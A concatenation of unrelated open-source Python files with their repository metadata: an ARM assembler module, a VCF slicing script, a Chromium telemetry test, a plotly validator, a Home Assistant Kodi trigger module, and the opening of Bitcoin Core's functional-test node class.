operand1 = operand1[:-1].strip()
Rn = parser.parse_register(operand0, checked=True)
RegisterList = sum(1<<r for r in parser.parse_regset(operand1))
fields = {"P": before, "U": increment, "Cond" : condition, "L" : load, "W" : W, "S" : S, "Rn" : Rn, "RegisterList" : RegisterList}
return _load_store_multi_format.encode(fields)
def _parse_push_pop(condition, load, parser, operands):
if len(operands) != 1:
parser.error("Expected 1 argument, got %d" % len(operands))
Rn = 13 # stack pointer
before = 1 - load
increment = load
RegisterList = sum(1<<r for r in parser.parse_regset(operands[0]))
fields = {"P": before, "U": increment, "Cond" : condition, "L" : load, "W" : 1, "S" : 0, "Rn" : Rn, "RegisterList" : RegisterList}
return _load_store_multi_format.encode(fields)
def _parse_mul(condition, S, parser, operands):
if len(operands) != 3:
parser.error("Expected 3 arguments, got %d" % len(operands))
Rd = parser.parse_register(operands[0], checked=True)
Rm = parser.parse_register(operands[1], checked=True)
Rs = parser.parse_register(operands[2], checked=True)
if Rd == Rm:
Rm, Rs = Rs, Rm
return _mul_format.encode({"Rd" : Rd, "Rm" : Rm, "Rs" : Rs, "Cond" : condition, "S" : S})
def _parse_mla(condition, S, parser, operands):
if len(operands) != 4:
parser.error("Expected 4 arguments, got %d" % len(operands))
Rd = parser.parse_register(operands[0], checked=True)
Rm = parser.parse_register(operands[1], checked=True)
Rs = parser.parse_register(operands[2], checked=True)
Rn = parser.parse_register(operands[3], checked=True)
if Rd == Rm:
Rm, Rs = Rs, Rm
return _mla_format.encode({"Rd" : Rd, "Rm" : Rm, "Rs" : Rs, "Rn" : Rn, "Cond" : condition, "S" : S})
def _parse_clz(condition, parser, operands):
if len(operands) != 2:
parser.error("Expected 2 arguments, got %d" % len(operands))
Rd = parser.parse_register(operands[0], checked=True)
Rm = parser.parse_register(operands[1], checked=True)
return _clz_format.encode({"Rd" : Rd, "Rm" : Rm, "Cond" : condition})
def _parse_mrs(condition, parser, operands):
if len(operands) != 2:
parser.error("Expected 2 arguments, got %d" % len(operands))
Rd = parser.parse_register(operands[0], checked=True)
R = parser.parse_status_register(operands[1])
return _mrs_format.encode({"Rd" : Rd, "R" : R, "Cond" : condition})
def _parse_msr(condition, parser, operands):
if len(operands) != 2:
parser.error("Expected 2 arguments, got %d" % len(operands))
R, fields = parser.parse_status_register_flags(operands[0])
fields["R"] = R
fields["Cond"] = condition
imm = parser.parse_immediate(operands[1])
if imm is not None:
fields["Operand2"] = parser.encode_immediate(imm)
return _msr_format_imm.encode(fields)
else:
Rm = parser.parse_register(operands[1], checked=True)
fields["Rm"] = Rm
return _msr_format_reg.encode(fields)
def _parse_swi(condition, parser, operands):
if len(operands) != 1:
parser.error("Expected 1 argument, got %d" % len(operands))
imm24 = parser.parse_immediate(operands[0], checked=True)
limit = 1<<24
if imm24 < 0 or imm24 >= limit:
parser.error("Immediate value should be between 0 and %d, got: %d" % (limit - 1, imm24))
return _swi_format.encode({"Cond": condition, "Imm24" : imm24})
# Install data-processing instructions
_dpi_instructions = [("and", 0), ("eor", 1), ("sub", 2), ("rsb", 3), ("add", 4),
("adc", 5), ("sbc", 6), ("rsc", 7), ("orr", 12), ("bic", 14)]
for (_name, _opcode) in _dpi_instructions:
for _i in range(len(_conditions)):
_fullname = _name + _conditions[_i]
_instructions[_fullname] = _partial(_parse_dpi, _opcode, _i, 0)
_instructions[_fullname + "s"] = _partial(_parse_dpi, _opcode, _i, 1)
# Install move instructions
_move_instructions = [("mov", 13), ("mvn", 15)]
for (_name, _opcode) in _move_instructions:
for _i in range(len(_conditions)):
_fullname = _name + _conditions[_i]
_instructions[_fullname] = _partial(_parse_move, _opcode, _i, 0)
_instructions[_fullname + "s"] = _partial(_parse_move, _opcode, _i, 1)
# Install test instructions
_cond_instructions = [("tst", 8), ("teq", 9), ("cmp", 10), ("cmn", 11)]
for (_name, _opcode) in _cond_instructions:
for _i in range(len(_conditions)):
_fullname = _name + _conditions[_i]
_instructions[_fullname] = _partial(_parse_cond, _opcode, _i, 1)
# Install branch instructions
for _i in range(len(_conditions)):
_fullname = "b" + _conditions[_i]
_instructions[_fullname] = _partial(_parse_branch, _i, 0)
_fullname = "bl" + _conditions[_i]
_instructions[_fullname] = _partial(_parse_branch, _i, 1)
_fullname = "bx" + _conditions[_i]
_instructions[_fullname] = _partial(_parse_bx, _i, 0)
_fullname = "blx" + _conditions[_i]
_instructions[_fullname] = _partial(_parse_bx, _i, 1)
# Install load/store instructions
for _i in range(len(_conditions)):
_fullname = "ldr" + _conditions[_i]
_instructions[_fullname] = _partial(_parse_load_store, _i, 1, 0)
_fullname = "str" + _conditions[_i]
_instructions[_fullname] = _partial(_parse_load_store, _i, 0, 0)
_fullname = "ldr" + _conditions[_i] + "b"
_instructions[_fullname] = _partial(_parse_load_store, _i, 1, 1)
_fullname = "str" + _conditions[_i] + "b"
_instructions[_fullname] = _partial(_parse_load_store, _i, 0, 1)
# Install load/store instructions
for _i in range(len(_conditions)):
_fullname = "ldr" + _conditions[_i]
_instructions[_fullname] = _partial(_parse_load_store, _i, 1, 0)
_fullname = "str" + _conditions[_i]
_instructions[_fullname] = _partial(_parse_load_store, _i, 0, 0)
_fullname = "ldr" + _conditions[_i] + "b"
_instructions[_fullname] = _partial(_parse_load_store, _i, 1, 1)
_fullname = "str" + _conditions[_i] + "b"
_instructions[_fullname] = _partial(_parse_load_store, _i, 0, 1)
# Install load/store multi instructions
for _i in range(len(_conditions)):
_fullname = "push" + _conditions[_i]
_instructions[_fullname] = _partial(_parse_push_pop, _i, 0)
_fullname = "pop" + _conditions[_i]
_instructions[_fullname] = _partial(_parse_push_pop, _i, 1)
for _increment in range(2):
for _before in range(2):
_mode = "di"[_increment] + "ab"[_before]
_fullname = "ldm" + _conditions[_i] + _mode
_instructions[_fullname] = _partial(_parse_load_store_multi, _i, 1, _before, _increment)
_fullname = "stm" + _conditions[_i] + _mode
_instructions[_fullname] = _partial(_parse_load_store_multi, _i, 0, _before, _increment)
# Install MULtiply instructions
for _i in range(len(_conditions)):
_fullname = "mul" + _conditions[_i]
_instructions[_fullname] = _partial(_parse_mul, _i, 0)
_fullname = _fullname + "s"
_instructions[_fullname] = _partial(_parse_mul, _i, 1)
_fullname = "mla" + _conditions[_i]
_instructions[_fullname] = _partial(_parse_mla, _i, 0)
_fullname = _fullname + "s"
_instructions[_fullname] = _partial(_parse_mla, _i, 1)
# Install Count Leading Zero instructions
for _i in range(len(_conditions)):
_fullname = "clz" + _conditions[_i]
_instructions[_fullname] = _partial(_parse_clz, _i)
# Install Move Register from/to Status instructions
for _i in range(len(_conditions)):
_fullname = "mrs" + _conditions[_i]
_instructions[_fullname] = _partial(_parse_mrs, _i)
_fullname = "msr" + _conditions[_i]
_instructions[_fullname] = _partial(_parse_msr, _i)
# Install SoftWare Interrupt instructions
for _i in range(len(_conditions)):
for _name in ("swi", "svc"):
_fullname = _name + _conditions[_i]
_instructions[_fullname] = _partial(_parse_swi, _i)
# support for LDR pseudo-instruction
def _wrap_ldr(ldr, mov, mvn, parser, operands):
if len(operands) == 2:
imm = parser.parse_immediate(operands[1], checked=False, prefix="=")
if imm is not None:
parser.parse_register(operands[0], checked=True)
if parser.encode_immediate(imm, checked=False) is not None:
operands = [operands[0], "#%d" % imm]
return mov(parser, operands)
elif parser.encode_immediate(~imm, checked=False) is not None:
operands = [operands[0], "#%d" % ~imm]
return mvn(parser, operands)
else:
address = parser.get_constant_pool_address(imm)
address = 4 * (address - parser.pc - 2)
return ldr(parser, [operands[0], "[pc, #%d]" % address])
return ldr(parser, operands)
for _cond in _conditions:
_name = "ldr" + _cond
_instructions[_name] = _partial(_wrap_ldr, _instructions[_name],
_instructions["mov" + _cond], _instructions["mvn" + _cond])
def _make_executable_array(opcodes):
import mmap
n = len(opcodes)
m = mmap.mmap(-1, 4*n, prot=mmap.PROT_READ|mmap.PROT_WRITE|mmap.PROT_EXEC)
result = (_ctypes.c_uint32 * n).from_buffer(m)
for i in range(n):
result[i] = opcodes[i]
return result
_type_flags = {
"b" : _ctypes.c_int8,
"B" : _ctypes.c_uint8,
"h" : _ctypes.c_int16,
"H" : _ctypes.c_uint16,
"i" : _ctypes.c_int32,
"I" : _ctypes.c_uint32,
"l" : _ctypes.c_int64,
"L" : _ctypes.c_uint64,
"str" : _ctypes.c_char_p,
"ch" : _ctypes.c_char,
"bool" : _ctypes.c_bool,
"p" : _ctypes.c_void_p,
"" : None
}
def prototype(proto):
if not isinstance(proto, str):
return proto
args, result = proto.split("->")
result = _type_flags[result.strip()]
args = [_type_flags[a.strip()] for a in args.split()]
return _ctypes.CFUNCTYPE(result, *args)
def _make_function(exec_array, proto):
proto = prototype(proto)
f = proto(_ctypes.addressof(exec_array))
f.__armasm_code__ = exec_array
return f
def asm(prototype, code, libraries=()):
"""Convert ARM assembler into a callable object.
Required arguments:
prototype -- either a `ctypes.CFUNCTYPE' object or a string acceptable to `armasm.prototype'
code -- the actual assembler code, as a string
Optional arguments:
libraries -- a sequence of either `ctypes.CDLL' objects or strings acceptable to `ctypes.util.find_library'
Examples:
asm("i i -> i", "mul r0, r1, r0") -- returns a callable object which takes two integers and returns their product
"""
linenumber = 0
pc = 0
_instructions = []
labels = {}
for line in code.split("\n"):
linenumber = linenumber + 1
instruction = _Instruction(line)
instruction.linenumber = linenumber
instruction.pc = pc
if instruction.label:
labels[instruction.label] = pc
if instruction.opcode:
pc = pc + 1
_instructions.append(instruction)
opcodes = []
parser = _OperandParser(libraries)
parser.labels = labels
parser.constant_pool_offset = pc + 1
for instruction in _instructions:
if instruction.opcode:
v = instruction.parse(parser)
opcodes.append(v)
opcodes.append(0xe12fff1e) # bx lr
opcodes.extend(parser.constant_pool)
result = _make_executable_array(opcodes)
return _make_function(result, prototype)
def dis(asm_function):
"""Disassemble assembled function object.
Given a callable object created with `armasm.asm', this function
prints its disassembled listing.
This functions uses the external `objdump' tool.
It first tries the ARM-specific `arm-linux-gnueabihf-objdump', then tries
the generic `objdump'.
If neither exist or their invocation produces an error, this function will error out.
"""
import tempfile
import os
import subprocess
f = tempfile.NamedTemporaryFile(delete=False)
try:
executable = subprocess.check_output(("which", "arm-linux-gnueabihf-objdump")).decode().strip()
except subprocess.CalledProcessError:
executable = "objdump"
try:
f.write(bytearray(asm_function.__armasm_code__))
f.close()
output = subprocess.check_output((executable, "-D", f.name, "-m", "arm", "-b", "binary")).decode()
finally:
os.unlink(f.name)
# try to skip useless headers
start = " 0:"
loc = output.find(start)
if loc >= 0:
output = output[loc:]
print(output)
|
{
"content_hash": "aa4d2043b31d05c41e1e5a9fe91a5c1e",
"timestamp": "",
"source": "github",
"line_count": 832,
"max_line_length": 134,
"avg_line_length": 35.90625,
"alnum_prop": 0.5745129544085158,
"repo_name": "stephanh42/armasm",
"id": "6967e72200a777a5aacc3d6d2a072579718a000c",
"size": "29874",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "armasm.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "30910"
}
],
"symlink_target": ""
}
|
"""
Tool to take a region of a VCF, cut it out, and re-assign all its coordinates to
a new contig name and starting offset.
Only rewrites schom and start columns; doesn't deal with any references to
positions that may occur in INFO or FORMAT values.
Variants only partially overlapping the specified range will be dropped.
"""
import argparse
import sys
import os
import doctest
def parse_args(args):
"""
Takes in the command-line arguments list (args), and returns a nice argparse
result with fields for all the options.
Borrows heavily from the argparse documentation examples:
<http://docs.python.org/library/argparse.html>
"""
# Construct the parser (which is stored in parser)
# Module docstring lives in __doc__
# See http://python-forum.com/pythonforum/viewtopic.php?f=3&t=36847
# And a formatter class so our examples in the docstring look good. Isn't it
# convenient how we already wrapped it to 80 characters?
# See http://docs.python.org/library/argparse.html#formatter-class
parser = argparse.ArgumentParser(description=__doc__,
formatter_class=argparse.RawDescriptionHelpFormatter)
parser.add_argument("--vcf_in", default=sys.stdin,
type=argparse.FileType("r"),
help="VCF file to read")
parser.add_argument("--vcf_out", default=sys.stdout,
type=argparse.FileType("w"),
help="VCF file to write")
parser.add_argument("--source_contig", required=True,
help="contig name to extract variants from")
parser.add_argument("--source_start", default=1, type=int,
help="first base (inclusive) at which to start collecting variants")
parser.add_argument("--source_end", default=float("+inf"), type=int,
help="last base (exclusive) at which to stop collecting variants")
parser.add_argument("--dest_contig", default="ref",
help="contig name to place variants on")
parser.add_argument("--dest_start", default=1, type=int,
help="base on the destination contig corresponding to --source_start")
# The command line arguments start with the program name, which we don't
# want to treat as an argument for argparse. So we remove it.
args = args[1:]
return parser.parse_args(args)
def main(args):
"""
Parses command line arguments and do the work of the program.
"args" specifies the program arguments, with args[0] being the executable
name. The return value should be used as the program's exit code.
"""
if len(args) == 2 and args[1] == "--test":
# Run the tests
return doctest.testmod(optionflags=doctest.NORMALIZE_WHITESPACE)
options = parse_args(args) # This holds the nicely-parsed options object
for line in options.vcf_in:
# Loop through the lines in the input VCF. We need to copy the headers,
# and possibly copy and rewrite the records.
# Drop the newline
line = line.rstrip("\n")
if len(line) == 0:
# Skip blank lines
continue
if line[0] == "#":
# It's a header. Keep it
options.vcf_out.write("{}\n".format(line))
continue
# Otherwise it's a record
# Split on tabs
parts = line.split("\t")
if parts[0] != options.source_contig:
# It's not on the right contig
continue
# Parse where the variant starts
variant_start = int(parts[1])
if (variant_start < options.source_start or
variant_start >= options.source_end):
# It's out of range
return
# Rewrite position and contig
variant_start = (variant_start - options.source_start +
options.dest_start)
parts[1] = str(variant_start)
parts[0] = options.dest_contig
# Spit out the fixed variant
options.vcf_out.write("{}\n".format("\t".join(parts)))
if __name__ == "__main__" :
sys.exit(main(sys.argv))
|
{
"content_hash": "fb311988a0e63a2e78fceed268fbf5e9",
"timestamp": "",
"source": "github",
"line_count": 119,
"max_line_length": 80,
"avg_line_length": 34.9327731092437,
"alnum_prop": 0.6199182102477748,
"repo_name": "BD2KGenomics/hgvm-graph-bakeoff-evalutations",
"id": "11e30c0735a75a186eee3ce4ff911eda7f2fe25a",
"size": "4183",
"binary": false,
"copies": "6",
"ref": "refs/heads/master",
"path": "scripts/sliceVcf.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Perl",
"bytes": "2078"
},
{
"name": "Python",
"bytes": "506835"
},
{
"name": "Shell",
"bytes": "44981"
}
],
"symlink_target": ""
}
|
import unittest
from telemetry import benchmark
from telemetry.core import browser_options
from telemetry.core.backends.chrome import android_browser_finder
from telemetry.unittest import system_stub
class LoggingStub(object):
def __init__(self):
self.warnings = []
def info(self, msg, *args):
pass
def warn(self, msg, *args):
self.warnings.append(msg % args)
class AndroidBrowserFinderTest(unittest.TestCase):
def setUp(self):
self._stubs = system_stub.Override(android_browser_finder,
['adb_commands', 'os', 'subprocess'])
self._log_stub = LoggingStub()
def tearDown(self):
self._stubs.Restore()
def test_no_adb(self):
finder_options = browser_options.BrowserFinderOptions()
def NoAdb(*args, **kargs): # pylint: disable=W0613
raise OSError('not found')
self._stubs.subprocess.Popen = NoAdb
browsers = android_browser_finder.FindAllAvailableBrowsers(
finder_options, self._log_stub)
self.assertEquals(0, len(browsers))
def test_adb_no_devices(self):
finder_options = browser_options.BrowserFinderOptions()
browsers = android_browser_finder.FindAllAvailableBrowsers(
finder_options, self._log_stub)
self.assertEquals(0, len(browsers))
def test_adb_permissions_error(self):
finder_options = browser_options.BrowserFinderOptions()
self._stubs.subprocess.Popen.communicate_result = (
"""List of devices attached
????????????\tno permissions""",
"""* daemon not running. starting it now on port 5037 *
* daemon started successfully *
""")
browsers = android_browser_finder.FindAllAvailableBrowsers(
finder_options, self._log_stub)
self.assertEquals(3, len(self._log_stub.warnings))
self.assertEquals(0, len(browsers))
def test_adb_two_devices(self):
finder_options = browser_options.BrowserFinderOptions()
self._stubs.adb_commands.attached_devices = ['015d14fec128220c',
'015d14fec128220d']
browsers = android_browser_finder.FindAllAvailableBrowsers(
finder_options, self._log_stub)
self.assertEquals(1, len(self._log_stub.warnings))
self.assertEquals(0, len(browsers))
@benchmark.Disabled('chromeos')
def test_adb_one_device(self):
finder_options = browser_options.BrowserFinderOptions()
self._stubs.adb_commands.attached_devices = ['015d14fec128220c']
def OnPM(args):
assert args[0] == 'pm'
assert args[1] == 'list'
assert args[2] == 'packages'
return ['package:org.chromium.content_shell_apk',
'package.com.google.android.setupwizard']
self._stubs.adb_commands.shell_command_handlers['pm'] = OnPM
browsers = android_browser_finder.FindAllAvailableBrowsers(
finder_options, self._log_stub)
self.assertEquals(1, len(browsers))
|
{
"content_hash": "38cc308d8cdde3a5a07af4cafaffc7d0",
"timestamp": "",
"source": "github",
"line_count": 89,
"max_line_length": 76,
"avg_line_length": 32.325842696629216,
"alnum_prop": 0.6798748696558915,
"repo_name": "ondra-novak/chromium.src",
"id": "de9e72a83d9a0b10147346aefadeeaf1800af0c4",
"size": "3040",
"binary": false,
"copies": "6",
"ref": "refs/heads/nw",
"path": "tools/telemetry/telemetry/core/backends/chrome/android_browser_finder_unittest.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "AppleScript",
"bytes": "6973"
},
{
"name": "Arduino",
"bytes": "464"
},
{
"name": "Assembly",
"bytes": "35318"
},
{
"name": "Batchfile",
"bytes": "7621"
},
{
"name": "C",
"bytes": "8692951"
},
{
"name": "C++",
"bytes": "206833388"
},
{
"name": "CSS",
"bytes": "871479"
},
{
"name": "HTML",
"bytes": "24541148"
},
{
"name": "Java",
"bytes": "5457985"
},
{
"name": "JavaScript",
"bytes": "17791684"
},
{
"name": "Makefile",
"bytes": "92563"
},
{
"name": "Objective-C",
"bytes": "1312233"
},
{
"name": "Objective-C++",
"bytes": "7105758"
},
{
"name": "PHP",
"bytes": "97817"
},
{
"name": "PLpgSQL",
"bytes": "218379"
},
{
"name": "Perl",
"bytes": "69392"
},
{
"name": "Protocol Buffer",
"bytes": "387183"
},
{
"name": "Python",
"bytes": "6929739"
},
{
"name": "Shell",
"bytes": "473664"
},
{
"name": "Standard ML",
"bytes": "4131"
},
{
"name": "XSLT",
"bytes": "418"
},
{
"name": "nesC",
"bytes": "15206"
}
],
"symlink_target": ""
}
|
import _plotly_utils.basevalidators
class SizeValidator(_plotly_utils.basevalidators.NumberValidator):
def __init__(
self, plotly_name="size", parent_name="histogram2dcontour.contours", **kwargs
):
super(SizeValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "plot"),
implied_edits=kwargs.pop("implied_edits", {"^autocontour": False}),
min=kwargs.pop("min", 0),
**kwargs,
)
|
{
"content_hash": "3c97570aef3e21d40dc8a81444cc79c3",
"timestamp": "",
"source": "github",
"line_count": 15,
"max_line_length": 85,
"avg_line_length": 36,
"alnum_prop": 0.5962962962962963,
"repo_name": "plotly/plotly.py",
"id": "e65320a576201eddcaaf0d741b18a0ab191c6a47",
"size": "540",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "packages/python/plotly/plotly/validators/histogram2dcontour/contours/_size.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "545"
},
{
"name": "JavaScript",
"bytes": "2074"
},
{
"name": "PostScript",
"bytes": "565328"
},
{
"name": "Python",
"bytes": "31506317"
},
{
"name": "TypeScript",
"bytes": "71337"
}
],
"symlink_target": ""
}
|
"""Provides device automations for Kodi."""
from __future__ import annotations
import voluptuous as vol
from homeassistant.components.device_automation import DEVICE_TRIGGER_BASE_SCHEMA
from homeassistant.const import (
ATTR_ENTITY_ID,
CONF_DEVICE_ID,
CONF_DOMAIN,
CONF_ENTITY_ID,
CONF_PLATFORM,
CONF_TYPE,
)
from homeassistant.core import CALLBACK_TYPE, Event, HassJob, HomeAssistant, callback
from homeassistant.helpers import config_validation as cv, entity_registry
from homeassistant.helpers.trigger import TriggerActionType, TriggerInfo
from homeassistant.helpers.typing import ConfigType
from .const import DOMAIN, EVENT_TURN_OFF, EVENT_TURN_ON
TRIGGER_TYPES = {"turn_on", "turn_off"}
TRIGGER_SCHEMA = DEVICE_TRIGGER_BASE_SCHEMA.extend(
{
vol.Required(CONF_ENTITY_ID): cv.entity_id,
vol.Required(CONF_TYPE): vol.In(TRIGGER_TYPES),
}
)
async def async_get_triggers(
hass: HomeAssistant, device_id: str
) -> list[dict[str, str]]:
"""List device triggers for Kodi devices."""
registry = entity_registry.async_get(hass)
triggers = []
# Get all the integrations entities for this device
for entry in entity_registry.async_entries_for_device(registry, device_id):
if entry.domain == "media_player":
triggers.append(
{
CONF_PLATFORM: "device",
CONF_DEVICE_ID: device_id,
CONF_DOMAIN: DOMAIN,
CONF_ENTITY_ID: entry.entity_id,
CONF_TYPE: "turn_on",
}
)
triggers.append(
{
CONF_PLATFORM: "device",
CONF_DEVICE_ID: device_id,
CONF_DOMAIN: DOMAIN,
CONF_ENTITY_ID: entry.entity_id,
CONF_TYPE: "turn_off",
}
)
return triggers
@callback
def _attach_trigger(
hass: HomeAssistant,
config: ConfigType,
action: TriggerActionType,
event_type,
trigger_info: TriggerInfo,
):
trigger_data = trigger_info["trigger_data"]
job = HassJob(action)
@callback
def _handle_event(event: Event):
if event.data[ATTR_ENTITY_ID] == config[CONF_ENTITY_ID]:
hass.async_run_hass_job(
job,
{"trigger": {**trigger_data, **config, "description": event_type}},
event.context,
)
return hass.bus.async_listen(event_type, _handle_event)
async def async_attach_trigger(
hass: HomeAssistant,
config: ConfigType,
action: TriggerActionType,
trigger_info: TriggerInfo,
) -> CALLBACK_TYPE:
"""Attach a trigger."""
if config[CONF_TYPE] == "turn_on":
return _attach_trigger(hass, config, action, EVENT_TURN_ON, trigger_info)
if config[CONF_TYPE] == "turn_off":
return _attach_trigger(hass, config, action, EVENT_TURN_OFF, trigger_info)
return lambda: None
|
{
"content_hash": "30b1f42f543c7aabff2f3c2bad470c5c",
"timestamp": "",
"source": "github",
"line_count": 100,
"max_line_length": 85,
"avg_line_length": 29.89,
"alnum_prop": 0.6122448979591837,
"repo_name": "nkgilley/home-assistant",
"id": "07fcf11c0771e5cd00335b802c04a88a43757bdf",
"size": "2989",
"binary": false,
"copies": "3",
"ref": "refs/heads/dev",
"path": "homeassistant/components/kodi/device_trigger.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "2963"
},
{
"name": "PLSQL",
"bytes": "840"
},
{
"name": "Python",
"bytes": "51597279"
},
{
"name": "Shell",
"bytes": "6252"
}
],
"symlink_target": ""
}
|
"""Class for bitcoind node under test"""
import contextlib
import decimal
import errno
from enum import Enum
import http.client
import json
import logging
import os
import re
import subprocess
import tempfile
import time
import urllib.parse
import collections
import shlex
import sys
from .authproxy import JSONRPCException
from .util import (
MAX_NODES,
append_config,
delete_cookie_file,
get_rpc_proxy,
rpc_url,
wait_until,
p2p_port,
EncodeDecimal,
)
BITCOIND_PROC_WAIT_TIMEOUT = 60
class FailedToStartError(Exception):
"""Raised when a node fails to start correctly."""
class ErrorMatch(Enum):
FULL_TEXT = 1
FULL_REGEX = 2
PARTIAL_REGEX = 3
class TestNode():
"""A class for representing a bitcoind node under test.
This class contains:
- state about the node (whether it's running, etc)
- a Python subprocess.Popen object representing the running process
- an RPC connection to the node
- one or more P2P connections to the node
To make things easier for the test writer, any unrecognised messages will
be dispatched to the RPC connection."""
def __init__(self, i, datadir, *, chain, rpchost, timewait, bitcoind, bitcoin_cli, coverage_dir, cwd, extra_conf=None, extra_args=None, use_cli=False, start_perf=False, use_valgrind=False, version=None):
"""
Kwargs:
start_perf (bool): If True, begin profiling the node with `perf` as soon as
the node starts.
"""
self.index = i
self.datadir = datadir
self.bitcoinconf = os.path.join(self.datadir, "bitcoin.conf")
self.stdout_dir = os.path.join(self.datadir, "stdout")
self.stderr_dir = os.path.join(self.datadir, "stderr")
self.chain = chain
self.rpchost = rpchost
self.rpc_timeout = timewait
self.binary = bitcoind
self.coverage_dir = coverage_dir
self.cwd = cwd
if extra_conf is not None:
append_config(datadir, extra_conf)
# Most callers will just need to add extra args to the standard list below.
# For those callers that need more flexibility, they can just set the args property directly.
# Note that common args are set in the config file (see initialize_datadir)
self.extra_args = extra_args
self.version = version
# Configuration for logging is set as command-line args rather than in the bitcoin.conf file.
# This means that starting a bitcoind using the temp dir to debug a failed test won't
# spam debug.log.
self.args = [
self.binary,
"-datadir=" + self.datadir,
"-logtimemicros",
"-debug",
"-debugexclude=libevent",
"-debugexclude=leveldb",
"-uacomment=testnode%d" % i,
]
if use_valgrind:
default_suppressions_file = os.path.join(
os.path.dirname(os.path.realpath(__file__)),
"..", "..", "..", "contrib", "valgrind.supp")
suppressions_file = os.getenv("VALGRIND_SUPPRESSIONS_FILE",
default_suppressions_file)
self.args = ["valgrind", "--suppressions={}".format(suppressions_file),
"--gen-suppressions=all", "--exit-on-first-error=yes",
"--error-exitcode=1", "--quiet"] + self.args
if self.version is None or self.version >= 190000:
self.args.append("-logthreadnames")
self.cli = TestNodeCLI(bitcoin_cli, self.datadir)
self.use_cli = use_cli
self.start_perf = start_perf
self.running = False
self.process = None
self.rpc_connected = False
self.rpc = None
self.url = None
self.log = logging.getLogger('TestFramework.node%d' % i)
self.cleanup_on_exit = True # Whether to kill the node when this object goes away
# Cache perf subprocesses here by their data output filename.
self.perf_subprocesses = {}
self.p2ps = []
AddressKeyPair = collections.namedtuple('AddressKeyPair', ['address', 'key'])
PRIV_KEYS = [
# address , privkey
AddressKeyPair('mjTkW3DjgyZck4KbiRusZsqTgaYTxdSz6z', 'cVpF924EspNh8KjYsfhgY96mmxvT6DgdWiTYMtMjuM74hJaU5psW'),
AddressKeyPair('msX6jQXvxiNhx3Q62PKeLPrhrqZQdSimTg', 'cUxsWyKyZ9MAQTaAhUQWJmBbSvHMwSmuv59KgxQV7oZQU3PXN3KE'),
AddressKeyPair('mnonCMyH9TmAsSj3M59DsbH8H63U3RKoFP', 'cTrh7dkEAeJd6b3MRX9bZK8eRmNqVCMH3LSUkE3dSFDyzjU38QxK'),
AddressKeyPair('mqJupas8Dt2uestQDvV2NH3RU8uZh2dqQR', 'cVuKKa7gbehEQvVq717hYcbE9Dqmq7KEBKqWgWrYBa2CKKrhtRim'),
AddressKeyPair('msYac7Rvd5ywm6pEmkjyxhbCDKqWsVeYws', 'cQDCBuKcjanpXDpCqacNSjYfxeQj8G6CAtH1Dsk3cXyqLNC4RPuh'),
AddressKeyPair('n2rnuUnwLgXqf9kk2kjvVm8R5BZK1yxQBi', 'cQakmfPSLSqKHyMFGwAqKHgWUiofJCagVGhiB4KCainaeCSxeyYq'),
AddressKeyPair('myzuPxRwsf3vvGzEuzPfK9Nf2RfwauwYe6', 'cQMpDLJwA8DBe9NcQbdoSb1BhmFxVjWD5gRyrLZCtpuF9Zi3a9RK'),
AddressKeyPair('mumwTaMtbxEPUswmLBBN3vM9oGRtGBrys8', 'cSXmRKXVcoouhNNVpcNKFfxsTsToY5pvB9DVsFksF1ENunTzRKsy'),
AddressKeyPair('mpV7aGShMkJCZgbW7F6iZgrvuPHjZjH9qg', 'cSoXt6tm3pqy43UMabY6eUTmR3eSUYFtB2iNQDGgb3VUnRsQys2k'),
AddressKeyPair('mq4fBNdckGtvY2mijd9am7DRsbRB4KjUkf', 'cN55daf1HotwBAgAKWVgDcoppmUNDtQSfb7XLutTLeAgVc3u8hik'),
AddressKeyPair('mpFAHDjX7KregM3rVotdXzQmkbwtbQEnZ6', 'cT7qK7g1wkYEMvKowd2ZrX1E5f6JQ7TM246UfqbCiyF7kZhorpX3'),
AddressKeyPair('mzRe8QZMfGi58KyWCse2exxEFry2sfF2Y7', 'cPiRWE8KMjTRxH1MWkPerhfoHFn5iHPWVK5aPqjW8NxmdwenFinJ'),
]
def get_deterministic_priv_key(self):
"""Return a deterministic priv key in base58, that only depends on the node's index"""
assert len(self.PRIV_KEYS) == MAX_NODES
return self.PRIV_KEYS[self.index]
def _node_msg(self, msg: str) -> str:
"""Return a modified msg that identifies this node by its index as a debugging aid."""
return "[node %d] %s" % (self.index, msg)
def _raise_assertion_error(self, msg: str):
"""Raise an AssertionError with msg modified to identify this node."""
raise AssertionError(self._node_msg(msg))
def __del__(self):
# Ensure that we don't leave any bitcoind processes lying around after
# the test ends
if self.process and self.cleanup_on_exit:
# Should only happen on test failure
# Avoid using logger, as that may have already been shutdown when
# this destructor is called.
print(self._node_msg("Cleaning up leftover process"))
self.process.kill()
def __getattr__(self, name):
"""Dispatches any unrecognised messages to the RPC connection or a CLI instance."""
if self.use_cli:
return getattr(self.cli, name)
else:
assert self.rpc_connected and self.rpc is not None, self._node_msg("Error: no RPC connection")
return getattr(self.rpc, name)
def start(self, extra_args=None, *, cwd=None, stdout=None, stderr=None, **kwargs):
"""Start the node."""
if extra_args is None:
extra_args = self.extra_args
# Add a new stdout and stderr file each time bitcoind is started
if stderr is None:
stderr = tempfile.NamedTemporaryFile(dir=self.stderr_dir, delete=False)
if stdout is None:
stdout = tempfile.NamedTemporaryFile(dir=self.stdout_dir, delete=False)
self.stderr = stderr
self.stdout = stdout
if cwd is None:
cwd = self.cwd
# Delete any existing cookie file -- if such a file exists (eg due to
# unclean shutdown), it will get overwritten anyway by bitcoind, and
# potentially interfere with our attempt to authenticate
delete_cookie_file(self.datadir, self.chain)
# add environment variable LIBC_FATAL_STDERR_=1 so that libc errors are written to stderr and not the terminal
subp_env = dict(os.environ, LIBC_FATAL_STDERR_="1")
self.process = subprocess.Popen(self.args + extra_args, env=subp_env, stdout=stdout, stderr=stderr, cwd=cwd, **kwargs)
self.running = True
self.log.debug("bitcoind started, waiting for RPC to come up")
if self.start_perf:
self._start_perf()
def wait_for_rpc_connection(self):
"""Sets up an RPC connection to the bitcoind process. Returns False if unable to connect."""
# Poll at a rate of four times per second
poll_per_s = 4
for _ in range(poll_per_s * self.rpc_timeout):
if self.process.poll() is not None:
